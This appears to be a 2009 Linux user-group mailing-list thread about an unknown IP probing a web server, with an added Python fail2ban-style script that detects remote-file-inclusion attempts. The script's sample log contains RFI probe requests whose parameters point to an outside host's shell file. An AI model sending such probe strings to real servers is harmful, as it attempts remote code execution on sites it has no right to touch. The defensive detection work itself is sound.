michaelbaker at westnet.com.au
Sun Jan 11 22:35:41 WST 2009

Most likely a script kiddie box or a hacked machine running scripts to search for RFIs which will allow it to execute PHP code on your web server. Google mod_security, that will stop a lot of it, or get something like fail2ban watching the web server logs for 404s and it can firewall the IPs for you.
----- Original Message -----
From: Niffum <bulkniffum at iinet.net.au>
To: plug at plug.org.au
Sent: Sun, 11 Jan 2009 19:01:30 +0900 (WST)
Subject: Re: [plug]

I tried nslookup to resolve the IP address, I didn't know about dig -x.

I thought it may be a dodgy host because I would expect that a non-dodgy 
host would have created a reverse lookup that I could just nslookup.

Trend is installed on this PC so that would be why.  I was about to 
add that IP address to my already huge hosts.deny

At 05:52 PM 11/01/2009, you wrote:

>It seems that the IP address is hosted in Japan.
>whois tells me
>inetnum: -
>netname:      JAPAN150
>country:      JP
>descr:        Japan Network Information Center
>    <snip>
>role:         Japan Network Information Center
>address:      Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
>address:      Chiyoda-ku, Tokyo 101-0047, Japan
>country:      JP
>    <snip>
>and a reverse DNS tells me that trendmicro are using the specific IP.
>dig -x
>; <<>> DiG 9.3.4-P1 <<>> -x
>;; global options:  printcmd
>;; Got answer:
>;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26411
>;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
>;     IN      PTR
>70.150.in-addr.arpa.    3600    IN      SOA 
>tmns1.trendmicro.com. dnsadmin.trendmicro.com. 55 60 600 86400 3600
>;; Query time: 1058 msec
>;; WHEN: Sun Jan 11 17:40:17 2009
>;; MSG SIZE  rcvd: 108
>Not knowing your set up: is it possible you have the Trend Micro 
>antivirus software installed and that this is using a remote service 
>to check websites for malicious code or whatever on the website?
>My dealings with Trend Micro are that their products are pretty good, 
>so I don't think that it is a dodgy remote host.
>good luck
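
As an added illustration of the log-watching approach Michael suggests above (this is example code written for this page, not anything posted to the list and not fail2ban's or mod_security's own code), the script below does by hand what a fail2ban filter plus jail would do: it parses Apache combined-format access log lines, flags any source IP whose query string carries an absolute URL in a parameter value (the classic remote-file-inclusion probe, `?page=http://host/shell.txt?`), counts 404s per IP, and renders the iptables DROP rules fail2ban's iptables action would run. The log format regex, the 404 threshold and the sample log lines are all assumptions made for the example; the addresses come from the RFC 5737 documentation ranges and the lines are constructed, not real traffic.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" LogFormat. Assumed for this example; match it to your own
# LogFormat before pointing it at real logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# An RFI probe hands the target script a full URL in a parameter that the
# vulnerable application later feeds to include()/require(). The scheme prefix
# is the stable signature; the parameter name changes with every app probed.
RFI_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log lines (not from the original thread).
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jan/2009:17:40:01 +0900] "GET /index.php?page=http://198.51.100.9/c.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [11/Jan/2009:17:40:02 +0900] "GET /admin/index.php?inc=http://198.51.100.9/c.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [11/Jan/2009:17:40:03 +0900] "GET /phpbb/index.php?phpbb_root_path=http://198.51.100.9/c.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.8 - - [11/Jan/2009:17:40:30 +0900] "GET /index.php?option=com_content&mosConfig_absolute_path=http%3A%2F%2F198.51.100.9%2Fc.txt%3F HTTP/1.1" 200 4210 "-" "Mozilla/4.0"
198.51.100.23 - - [11/Jan/2009:17:41:10 +0900] "GET /robots.txt HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.23 - - [11/Jan/2009:17:41:11 +0900] "GET /index.php?page=contact HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
192.0.2.44 - - [11/Jan/2009:17:42:00 +0900] "GET /wp-login.php HTTP/1.1" 404 209 "-" "scanner"
192.0.2.44 - - [11/Jan/2009:17:42:01 +0900] "GET /phpmyadmin/ HTTP/1.1" 404 209 "-" "scanner"
192.0.2.44 - - [11/Jan/2009:17:42:02 +0900] "GET /pma/ HTTP/1.1" 404 209 "-" "scanner"
192.0.2.44 - - [11/Jan/2009:17:42:03 +0900] "GET /mysql/ HTTP/1.1" 404 209 "-" "scanner"
192.0.2.44 - - [11/Jan/2009:17:42:04 +0900] "GET /admin/ HTTP/1.1" 404 209 "-" "scanner"
"""


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_rfi_probe(target):
    """True if any query-string value of the request target is an absolute URL.

    parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well.
    Only query values are inspected, so a Referer of http://... elsewhere in
    the log line does not trigger a match.
    """
    query = urlsplit(target).query
    return any(RFI_VALUE_RE.match(value)
               for _, value in parse_qsl(query, keep_blank_values=True))


def analyse(lines, not_found_threshold=5):
    """Classify source IPs the way a fail2ban filter plus jail would.

    Returns (rfi_ips, noisy_404_ips): IPs that sent at least one RFI payload,
    and IPs that produced >= not_found_threshold 404 responses.
    """
    rfi_ips = set()
    not_found = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_rfi_probe(rec["target"]):
            rfi_ips.add(rec["ip"])
        if rec["status"] == 404:
            not_found[rec["ip"]] += 1
    noisy = {ip for ip, n in not_found.items() if n >= not_found_threshold}
    return rfi_ips, noisy


def block_rules(ips):
    """Render one iptables DROP rule per offending IP (the equivalent of
    fail2ban's iptables ban action)."""
    return ["iptables -I INPUT -s %s -j DROP" % ip for ip in sorted(ips)]


if __name__ == "__main__":
    rfi, noisy = analyse(SAMPLE_LOG.splitlines())
    print("RFI probes from:", sorted(rfi))
    print("404 floods from:", sorted(noisy))
    for rule in block_rules(rfi | noisy):
        print(rule)
```

Two points worth noting when turning this into a real fail2ban filter: match on the decoded parameter value rather than grepping the raw line for `http://`, since the Referer field would otherwise ban legitimate visitors arriving from other sites; and keep the 404 threshold separate from the RFI signal, because a single RFI payload is already conclusive while a handful of 404s is just a browser looking for robots.txt and favicon.ico.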

PLUG discussion list: plug at plug.org.au
Committee e-mail: committee at plug.linux.org.au
